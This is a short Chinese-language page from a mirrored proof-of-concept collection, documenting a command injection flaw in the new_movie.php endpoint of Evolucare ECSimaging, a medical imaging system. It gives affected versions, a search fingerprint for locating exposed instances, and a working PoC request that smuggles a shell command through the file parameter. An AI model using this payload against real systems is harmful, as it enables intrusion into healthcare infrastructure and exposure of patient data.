mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
31 lines
544 B
Markdown
31 lines
544 B
Markdown
|
# Evolucare Ecsimaging new_movie.php 远程命令执行漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
EVOLUCARE ECSimage是一款国外使用的医疗管理系统,研究发现其new_movie.php接口中存在命令注入漏洞,攻击者可利用该漏洞获取系统敏感信息等.
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
EVOLUCARE Evolucare Ecsimaging 版本< 6.21.5
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
body="ECSimaging"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
登录页面
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
验证POC
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
/new_movie.php?studyUID=1&start=2&end=2&file=1;pwd
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|